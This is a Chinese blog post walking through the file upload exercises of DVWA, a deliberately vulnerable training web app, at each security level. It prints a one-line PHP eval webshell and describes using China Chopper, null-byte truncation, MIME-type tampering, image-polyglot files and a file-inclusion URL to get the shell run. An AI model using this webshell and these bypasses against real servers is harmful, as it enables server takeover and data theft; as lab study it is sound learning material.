File Upload(文件上传)

一句话木马
<?php
@eval($_POST['key']);
?>
/*eval(phpcode)
eval() 函数把字符串按照 PHP 代码来计算。
该字符串必须是合法的 PHP 代码,且必须以分号结尾。*/
通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。
Low
basename(path,suffix)
函数返回路径中的文件名部分,如果可选参数suffix为空,则返回的文件名包含后缀名,反之不包含后缀名。
我们看到服务器对上传的文件类型、内容或是文件大小都没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。
这段代码的核心就是验证是否有接收文件($_POST[‘Upload’])
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
DVWA_WEB_PAGE_TO_ROOT=E:\phpStudy2019_64\phpstudy_pro\WWW\DVWA
$target_path=E:\phpStudy2019_64\phpstudy_pro\WWW\DVWA/hackable/uploads/
因此最终你上传的文件的最终路径为:
$target_path=E:\phpStudy2019_64\phpstudy_pro\WWW\DVWA\hackable\uploads/123.jpg
123.jpg就是你要上传的目标文件。
漏洞利用
文件上传漏洞的利用条件:
1.能够成功上传木马文件
2.上传文件必须能够被执行
3.上传文件的路径必须可知
 
上传一句话木马
上传成功,并返回上传路径
打开中国菜刀,右键添加,
(这个url想了一会儿,两个../返回上级,回到了127.0.0.1/dvwa/)
然后菜刀就会通过向服务器发送包含key参数的post请求,在服务器上执行任意命令,获取webshell权限。可以下载、修改服务器的所有文件。
还可以打开服务器的虚拟终端。
 
Medium
Medium级别的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)。
漏洞利用
1.组合拳(文件包含+文件上传)
尝试修改文件名为hack.png,成功。
启用中国菜刀。不幸的是,虽然成功上传了文件,但是并不能成功获取webshell权限,在菜刀上无论进行什么操作都会返回如下信息。
中国菜刀的原理是向上传文件发送包含key参数的post请求,通过控制key参数来执行不同的命令,而这里服务器将木马文件解析成了图片文件,因此向其发送post请求时,服务器只会返回这个“图片”文件,并不会执行相应命令。
那么如何让服务器将其解析为php文件呢?可以借助Medium级别的文件包含漏洞来获取webshell权限,打开中国菜刀,右键添加,在地址栏中输入http://127.0.0.1/dvwa/vulnerabilities/fi/?page=hthttp://tp://127.0.0.1/dvwa/hackable/uploads/hack.png
我不知道为什么连不上?!但是文件包含+文件上传组合拳的思路很值得学习。
2.抓包修改文件类型type
上传hack.png文件,抓包。
可以看到文件类型为image/png,尝试修改filename为hack.php。成功。菜刀获取到webshell。
3.%00截断绕过规则
在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,我们可以在文件名中使用%00进行截断,可以把上传文件命名为hack.php%00.jpg。 因为 后缀是合法的.jpg格式,所以可以正常上传。
方法一:
在php<5.3.4中,处理字符串的函数认为0x00是终止符。那么我们可以利用 00截断 漏洞来上传我们的一句话木马。网站上传函数处理1.php%00.jpg时,首先后缀名是合法的jpg格式,可以上传,在保存文件时,使用burpsuite进行包拦截,找到上传的路径,把文件名改为 1.php[空格].jpg ,十六进制查看,空格的十六进制代码为20,将其修改为 00。后端在判断文件后缀名的时候遇到%00字符丢弃后面的jpg,文件后缀最终保存的后缀 名为 1.php。然后我们就可以用我们的菜刀连接了。
方法二:%00在burp中url解码
 
High
strrpos(string,find,start)
函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。
getimagesize(string filename)
函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。
可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”*.jpg”、”*.jpeg” 、”*.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。
漏洞利用
发现上传不了,因为仅仅后缀是图片格式的还不行,文件内容必须还得是图片格式的。
用copy /b 2.jpg + hack.php test.jpg
上传test.jpg成功,但是jpg后缀菜刀不能直接连接,必须要让他php解析。
可以利用DVWA的文件包含漏洞,让我们的图片格式的一句话木马以php格式运行。
url:
验证:用记事本或winhex打开,底部发现有一句话木马。
不知道为什么,火狐可以打开url,谷歌浏览器ERROR: File not found!。Cknife和中国菜刀都连接不上,也是找不到文件。
 
Impossible
对上传文件进行了重命名(md5),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。
 
 
 
posted @ 2020-04-25 11:58  zjwoo  阅读(2435)  评论(0编辑  收藏  举报